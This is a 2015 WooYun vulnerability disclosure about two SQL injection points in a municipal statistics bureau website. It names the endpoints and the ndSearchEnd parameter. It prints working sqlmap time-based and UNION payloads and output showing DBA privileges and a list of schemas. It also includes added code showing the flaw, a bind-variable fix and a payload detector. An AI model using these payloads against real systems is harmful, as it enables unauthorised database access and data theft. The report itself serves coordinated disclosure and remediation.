Vulnerability summary

Defect ID: wooyun-2015-0123135

Title: Two SQL injection points in a municipal Statistics Bureau site (DBA privileges)

Vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-07-02 10:49

Fixed: 2015-08-20 18:54

Published: 2015-08-20 18:54

Type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed to third-party partner organisation (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)


Vulnerability details

Disclosure status:

2015-07-02: Details sent to the vendor; awaiting vendor handling
2015-07-06: Vendor confirmed; details visible to the vendor only
2015-07-16: Details opened to core white hats and domain experts
2015-07-26: Details opened to regular white hats
2015-08-05: Details opened to intern white hats
2015-08-20: Details opened to the public

Brief description:

See title.

Detailed description:

Two SQL injection points (both POST requests; the injectable parameter is the same in each):

First:

http://tjdata.haimen.gov.cn/chart_singleDataList.do?type=index
POST parameters:
change=0&ids=&ndSearchEnd=-1&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
The ndSearchEnd parameter is injectable.


Second:

http://tjdata.haimen.gov.cn/chart_economicDataList.do?type=index
POST parameters:
change=0&dqlx=hms&fid=F737524D35DF4F0AA3AE2D142FBE0CFC&ids=&ndSearchEnd=-1&ndSearchStart=&nowPage=1&pageCount=24&pageEnd=0&sblx=jd&sblxsc=nd
The ndSearchEnd parameter is injectable.


[Screenshot: gov.jpg]
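The report does not show the back-end SQL, only that a quoted value in ndSearchEnd reaches it unchanged. The Python below is an added illustration, not the site's code: it assumes the year filter is built by string concatenation (the table and column names HMDATA.ND_DATA, nd and sz are invented), shows what sqlmap's time-based payload from the proof section turns the statement into, and beside it the fix the remediation section asks for: a whitelist on the year and id parameters plus bind variables, so the values are never part of the SQL text.

```python
import re
from urllib.parse import parse_qsl

# ASSUMPTION (the page never shows the JSP or its SQL): the year filter is
# built by string concatenation, which is how a quoted value such as
# ndSearchEnd=-1' ... ends up altering the statement. Table/column names
# (HMDATA.ND_DATA, nd, sz) are invented for the illustration.
def build_query_vulnerable(params):
    return ("SELECT nd, sz FROM HMDATA.ND_DATA"
            " WHERE zbid = '" + params.get("zbid", "") + "'"
            " AND nd >= '" + params.get("ndSearchStart", "") + "'"
            " AND nd <= '" + params.get("ndSearchEnd", "") + "'")

# Whitelist for the year fields: -1 ("unset", as in the captured request)
# or a four-digit year. zbid/fid in the captured requests are 32 upper-case
# hex characters. Anything else is refused before any SQL is built.
YEAR_RE = re.compile(r"-1|(?:19|20)\d{2}")
ID_RE = re.compile(r"[0-9A-F]{32}")

def validate(params):
    """Return typed, whitelisted values or raise ValueError naming the bad field."""
    cleaned = {}
    for name in ("ndSearchStart", "ndSearchEnd"):
        value = params.get(name, "") or "-1"      # empty string means unset
        if not YEAR_RE.fullmatch(value):
            raise ValueError("%s: expected -1 or a 4-digit year, got %r" % (name, value))
        cleaned[name] = int(value)
    zbid = params.get("zbid", "")
    if not ID_RE.fullmatch(zbid):
        raise ValueError("zbid: expected 32 upper-case hex characters")
    cleaned["zbid"] = zbid
    return cleaned

# Fixed form: validated values are passed as bind variables (":name"
# placeholders, the Oracle style; a JDBC PreparedStatement would use '?').
# The values are never spliced into the SQL text, so a quote in them
# cannot change the statement even if the whitelist were loosened later.
def build_query_safe(params):
    c = validate(params)
    sql = ("SELECT nd, sz FROM HMDATA.ND_DATA"
           " WHERE zbid = :zbid AND nd >= :nd_start AND nd <= :nd_end")
    binds = {"zbid": c["zbid"], "nd_start": c["ndSearchStart"], "nd_end": c["ndSearchEnd"]}
    return sql, binds

def parse_body(body):
    # application/x-www-form-urlencoded; sqlmap's payload is shown unencoded
    # here for readability, as it is in the report.
    return dict(parse_qsl(body, keep_blank_values=True))

# Request body from the report (first endpoint) and sqlmap's time-based
# payload for it, copied from the proof section.
BENIGN = ("change=0&ids=&ndSearchEnd=-1&ndSearchStart=&nowPage=1&pageCount=36"
          "&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8")
TIME_BASED = ("change=0&ids=&ndSearchEnd=-1' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE("
              "CHR(76)||CHR(117)||CHR(100)||CHR(110),5) AND 'WEbm' LIKE 'WEbm"
              "&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd"
              "&zbid=9D45DAB40C074E80B70C524A37498CC8")

def demo():
    """Vulnerable SQL for the payload, whether its quotes stay balanced,
    and whether the hardened builder refuses the same request."""
    vuln = build_query_vulnerable(parse_body(TIME_BASED))
    # The payload closes the open literal after -1, appends the delay
    # condition, then re-opens a literal ('WEbm' LIKE 'WEbm) so the
    # application's trailing quote still parses: the quote count is even.
    balanced = vuln.count("'") % 2 == 0
    try:
        build_query_safe(parse_body(TIME_BASED))
        rejected = False
    except ValueError:
        rejected = True
    return vuln, balanced, rejected

if __name__ == "__main__":
    sql, balanced, rejected = demo()
    print(sql)
    print("quotes balanced:", balanced, "| hardened builder rejected payload:", rejected)
    print(build_query_safe(parse_body(BENIGN)))
```

The whitelist alone would stop this payload, but the bind variables are what make the query safe regardless of what the whitelist allows later; the two belong together.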


Proof of vulnerability:

sqlmap output (first endpoint, chart_singleDataList.do). Note that the application account HMDATA holds the DBA role, so the injection can read any schema in the instance, not only HMDATA:

sqlmap identified the following injection points with a total of 1231 HTTP(s) requests:
---
Parameter: ndSearchEnd (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: change=0&ids=&ndSearchEnd=-1' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(117)||CHR(100)||CHR(110),5) AND 'WEbm' LIKE 'WEbm&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: change=0&ids=&ndSearchEnd=-1' UNION ALL SELECT CHR(113)||CHR(107)||CHR(118)||CHR(112)||CHR(113)||CHR(70)||CHR(74)||CHR(111)||CHR(120)||CHR(82)||CHR(102)||CHR(100)||CHR(80)||CHR(84)||CHR(72)||CHR(113)||CHR(118)||CHR(118)||CHR(106)||CHR(113),NULL FROM DUAL-- &ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8
Vector: UNION ALL SELECT [QUERY],NULL FROM DUAL--
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'HMDATA'
current schema (equivalent to database on Oracle): 'HMDATA'
current user is DBA: True
available databases [24]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HMDATA
[*] HMDATA_TEST
[*] HR
[*] IX
[*] MDSYS
[*] NTDATA
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
Second sqlmap run against the same injection point (resumed session, hence 0 new HTTP requests for detection), listing the tables in the HMDATA schema. Every name below has the BIN$...==$0 form, which is Oracle's recycle-bin naming for dropped tables that have not yet been purged:
Database: HMDATA
[36 tables]
+--------------------------------+
| BIN$/OJ59APMQYYVCQD4R9CYHQ==$0 |
| BIN$3ALHS3TQTQOHN8DVUAZ0GA==$0 |
| BIN$3UEQGJ16SN6O9WXXFS5TEQ==$0 |
| BIN$4PC5VRLUQUEKNRIOIAAXVW==$0 |
| BIN$8GISAK8YS3YQDY+G82LT8G==$0 |
| BIN$BI97240CSNM4I2DGKEVECQ==$0 |
| BIN$BZU1VTUGQKECVMBWXYQQQA==$0 |
| BIN$C8P9KDFTQRI9THM2E9B8QW==$0 |
| BIN$DA2WQDW8QWQDG+3YOKUIBG==$0 |
| BIN$EC7HJVEFQFS8KOFZAJ13ZG==$0 |
| BIN$F4ZJEALCQHYVP49YAPV/DW==$0 |
| BIN$FZOERHRLROAHRH97S9UKTA==$0 |
| BIN$GQJ3SHJHSBGGCA8L9IQFZG==$0 |
| BIN$HVDM3GJSS5YLPT37E/75ZW==$0 |
| BIN$HVQFNYBMRFAW60FW7P+E2G==$0 |
| BIN$JKXK6GNXQY690QMOXUC28W==$0 |
| BIN$KBBOZPLVRLC0L29GGO6/WA==$0 |
| BIN$KUKFYGDZRJGMKJ6IZPEPMQ==$0 |
| BIN$LD6YNGG5TKOKIGC+CUB/8Q==$0 |
| BIN$LKVCXPZRRWUK1AI0U9MU8A==$0 |
| BIN$LQEYNQD/QE6JXWOW/YCLFA==$0 |
| BIN$M71PKD8ITLQVBO+4K/TLPG==$0 |
| BIN$NMWXBK95RV66HL5FXDLRQG==$0 |
| BIN$NXTJK3IOQUKROLHVG9INXQ==$0 |
| BIN$Q+6OUM8XROWG9V9R1FZGXA==$0 |
| BIN$QHHQ4C6GROKUUBSA0VOH8Q==$0 |
| BIN$QPTY2WTORS6Z1G3C5BO2UQ==$0 |
| BIN$QSDI3O4LTEKWOMB3BBKHTW==$0 |
| BIN$RZLQN410Q7KITYI2AJHO/A==$0 |
| BIN$S6YUE2GRQW+F2SBQUUV86A==$0 |
| BIN$SSB0Q8FDTJWE79RTNRT/4A==$0 |
| BIN$T8YAVG71S9ODKSFRVM0PLW==$0 |
| BIN$UQ/MBWKNQUMVOKZP6ACVVA==$0 |
| BIN$URUCNEVWQTEZCAMJ9BGBGA==$0 |
| BIN$WICPQF2PQ1+OK1JHBEQLPQ==$0 |
| BIN$WWPW0DQQTXO52H8MBAVWZW==$0 |
+--------------------------------+
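As an added example (not part of the report), the script below reads the two sqlmap payloads from the output above the way a defender reviewing a WAF or request log would: it flags the Oracle-specific indicators (DBMS_PIPE.RECEIVE_MESSAGE as the delay primitive, UNION ... FROM DUAL, a trailing comment, CHR()||CHR() string building), recovers the sleep time, and decodes the CHR chains, which shows that the UNION column is sqlmap's own 20-character marker string rather than application data. The two attack bodies are copied from the report; the benign body is constructed.

```python
import re
from urllib.parse import parse_qsl

CHR_CALL = re.compile(r"CHR\((\d+)\)", re.I)
CHR_CHAIN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))*", re.I)
SLEEP_CALL = re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\((.*?),\s*(\d+)\s*\)", re.I | re.S)

INDICATORS = {
    # DBMS_PIPE.RECEIVE_MESSAGE on a pipe nobody writes to blocks until its
    # timeout: Oracle's usual time-based blind primitive (no SLEEP() as in MySQL).
    "oracle_time_delay": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I),
    # Oracle SELECT needs a FROM clause, so UNION payloads read FROM DUAL.
    "union_select_dual": re.compile(r"UNION\s+(?:ALL\s+)?SELECT\b.*\bFROM\s+DUAL\b", re.I | re.S),
    # "-- " at the end of the value comments out the application's trailing quote.
    "sql_comment": re.compile(r"--\s*$"),
    # CHR()||CHR() chains build string literals without typing a quote.
    "chr_literal": CHR_CHAIN,
}

def decode_chr_chain(expr):
    """'CHR(76)||CHR(117)' -> 'Lu'."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(expr))

def inspect_body(body):
    """One finding per POST parameter whose value trips an indicator."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = [k for k, rx in INDICATORS.items() if rx.search(value)]
        if not hits:
            continue
        finding = {
            "param": name,
            "indicators": hits,
            "decoded_strings": [decode_chr_chain(m.group(0)) for m in CHR_CHAIN.finditer(value)],
        }
        m = SLEEP_CALL.search(value)
        if m:
            finding["sleep_seconds"] = int(m.group(2))
        findings.append(finding)
    return findings

def union_markers(decoded):
    """sqlmap brackets the UNION column with two random 5-character markers
    so it can cut the query result out of the HTML response; the middle part
    is the [QUERY] output, here a random probe string."""
    return decoded[:5], decoded[5:-5], decoded[-5:]

# Constructed benign request (years filled in) and the two bodies from the report.
BENIGN = ("change=0&ids=&ndSearchEnd=2014&ndSearchStart=2010&nowPage=1&pageCount=36"
          "&pageEnd=0&sblx=nd&sblxsc=nd&zbid=9D45DAB40C074E80B70C524A37498CC8")
TIME_BASED = ("change=0&ids=&ndSearchEnd=-1' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE("
              "CHR(76)||CHR(117)||CHR(100)||CHR(110),5) AND 'WEbm' LIKE 'WEbm"
              "&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd"
              "&zbid=9D45DAB40C074E80B70C524A37498CC8")
UNION = ("change=0&ids=&ndSearchEnd=-1' UNION ALL SELECT CHR(113)||CHR(107)||CHR(118)"
         "||CHR(112)||CHR(113)||CHR(70)||CHR(74)||CHR(111)||CHR(120)||CHR(82)||CHR(102)"
         "||CHR(100)||CHR(80)||CHR(84)||CHR(72)||CHR(113)||CHR(118)||CHR(118)||CHR(106)"
         "||CHR(113),NULL FROM DUAL-- "
         "&ndSearchStart=&nowPage=1&pageCount=36&pageEnd=0&sblx=nd&sblxsc=nd"
         "&zbid=9D45DAB40C074E80B70C524A37498CC8")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("time-based", TIME_BASED), ("union", UNION)):
        print(label, inspect_body(body))
```

The decoded CHR chain in the UNION payload is qkvpq + FJoxRfdPTH + qvvjq: the outer five characters on each side are sqlmap's response markers, so seeing them in a request body (or in a response) is a reliable sign of an automated UNION extraction, independent of the keyword checks.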

Remediation:

Validate the parameters (ndSearchEnd and ndSearchStart should accept only -1 or a year) and pass them to the query as bind variables instead of concatenating them into the SQL string.

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-07-06 18:52

Vendor comment:

CNVD has confirmed and reproduced the reported issue. It has been forwarded via CNCERT to the Jiangsu branch centre, which will coordinate remediation with the organisation that runs the website.

Latest status:

None yet.